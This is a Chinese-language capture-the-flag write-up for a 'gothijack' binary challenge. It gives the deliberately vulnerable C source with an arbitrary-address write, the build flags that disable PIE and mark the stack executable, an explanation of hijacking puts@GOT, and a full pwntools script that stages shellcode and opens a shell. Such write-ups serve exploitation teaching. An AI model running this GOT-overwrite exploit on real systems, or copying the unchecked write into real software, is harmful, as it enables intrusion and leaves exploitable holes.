gothijack(GOT劫持)
1.题目
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* 64-byte global buffer in .bss. Because the binary is built with -no-pie its
 * address is fixed across runs (the exploit below uses 0x601080); this is the
 * landing zone for attacker-supplied bytes (shellcode). */
char name[64];
/*
 * Challenge entry point. Reads up to 64 bytes into the global `name`, then
 * lets the user pick an arbitrary address and writes 8 raw bytes from stdin
 * there: a write-what-where primitive. Built with -no-pie (static addresses)
 * and -z execstack (see the Makefile).
 */
int main()
{
/* Legal but unusual spelling of `unsigned long long int`; 64-bit, so it can
 * hold a full x86-64 pointer. */
int unsigned long long addr;
/* 2 == _IONBF on glibc: stdin and stdout are unbuffered. Unbuffered stdin
 * also means scanf() below consumes only the characters it parses, so the
 * later raw read(0, ...) sees exactly the next bytes the client sends. */
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
printf("What's you name?\n");
/* 0x40 == 64 bytes into a 64-byte buffer: no overflow, but no terminating
 * NUL is guaranteed either (relevant for the %s printf at the end). This is
 * where attacker-controlled bytes such as shellcode are staged. */
read(0, name, 0x40);
printf("Where do you want to write?\n");
/* Destination address is entirely user-chosen; there is no validation. */
scanf("%llu", &addr);
printf("Data: ");
/* Arbitrary 8-byte write: the next 8 bytes from stdin land at `addr`.
 * Pointing addr at a GOT entry redirects every later call through it. */
read(0, (char *)addr, 8);
/* First call through puts@GOT after the write: if that entry was
 * overwritten, control transfers to wherever it now points. */
puts("Done!");
/* %s over a buffer that may lack a NUL; could read past name[] until the
 * next zero byte in .bss. */
printf("Thank you %s!\n", name);
return 0;
}
Makefile:
# -no-pie: the main image is loaded at a fixed address, so GOT entries and
#          the global `name` have static addresses (0x601018 / 0x601080 in
#          the exploit below).
# -z execstack: marks the stack executable (PT_GNU_STACK RWE). The exploit
#          relies on this also making .bss executable, which older x86-64
#          kernels grant via READ_IMPLIES_EXEC. NOTE(review): newer kernels
#          no longer do this for 64-bit binaries; confirm on the target.
gothijack: gothijack.c
gcc gothijack.c -no-pie -z execstack -o gothijack
2.思路
分析题目源码发现 read(0, (char *)addr, 8) 可以在 addr 处写入 8 字节,而 addr 来自 scanf("%llu"),完全由我们控制——这是一个任意地址写原语。思路:先把 shellcode 写进 name(name 只有 64 字节,read 也只读 0x40 字节,所以 shellcode 必须不超过 64 字节),再把 addr 设为 got 表中 puts 的表项,用 read(0, (char *)addr, 8) 把该表项覆盖为 name 的地址。程序接下来执行的 puts("Done!") 会经 GOT 间接跳到 name 中的 shellcode,从而获得 shell。这样做有两个前提:编译参数 -no-pie 使 got 表项和 name 的地址固定;-z execstack 给程序加上可执行栈标记,在较旧的 x86-64 内核上(约 5.8 之前)这会触发 READ_IMPLIES_EXEC,使 .bss 中的 name 也可执行——较新内核已取消这一行为,届时 shellcode 可能无法在 name 中直接执行,需要换用其他利用方式。
用 objdump 查看 got 表中 puts 的表项地址和 name 变量的地址(下面脚本中使用的值分别为 0x601018 和 0x601080):`objdump -R gothijack | grep puts` 显示 puts 的 GOT 表项,`objdump -t gothijack | grep ' name$'`(或 `nm gothijack | grep -w name`)显示 name 的地址。
3.解题脚本
from pwn import *
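# r = remote("*.*.*.*", ****)
r = process('./gothijack')
context.arch = 'amd64'

# The binary is built with -no-pie, so its own addresses are static. Read them
# from the ELF rather than hard-coding objdump output, so the script survives
# a recompile. Expected values: puts@GOT = 0x601018, name = 0x601080.
elf = ELF('./gothijack')
puts_got = elf.got['puts']
name_addr = elf.symbols['name']
NAME_SIZE = 0x40  # read(0, name, 0x40) in the target

# Stage 1: shellcode goes into the global name[] buffer. read() stops at 0x40
# bytes, so a longer payload would be silently truncated and crash later.
sc = asm(shellcraft.sh())
if len(sc) > NAME_SIZE:
    log.error(f"shellcode is {len(sc)} bytes, name[] holds only {NAME_SIZE}")
r.recvuntil(b'?\n')  # "What's you name?"
r.send(sc)

# Stage 2: scanf("%llu") wants the target address as a decimal string.
r.recvuntil(b'?\n')  # "Where do you want to write?"
r.sendline(str(puts_got).encode())

# Stage 3: overwrite puts@GOT with the address of the shellcode. stdin is
# unbuffered in the target, so scanf consumes only the digits and the newline
# and the raw read(0, addr, 8) receives exactly these 8 bytes.
r.recvuntil(b'Data: ')
r.send(p64(name_addr))

# The next puts("Done!") now jumps into name[]. NOTE(review): this requires
# .bss to be executable; `-z execstack` only achieves that on kernels that
# still apply READ_IMPLIES_EXEC to 64-bit binaries (x86-64 before ~5.8).
r.interactive()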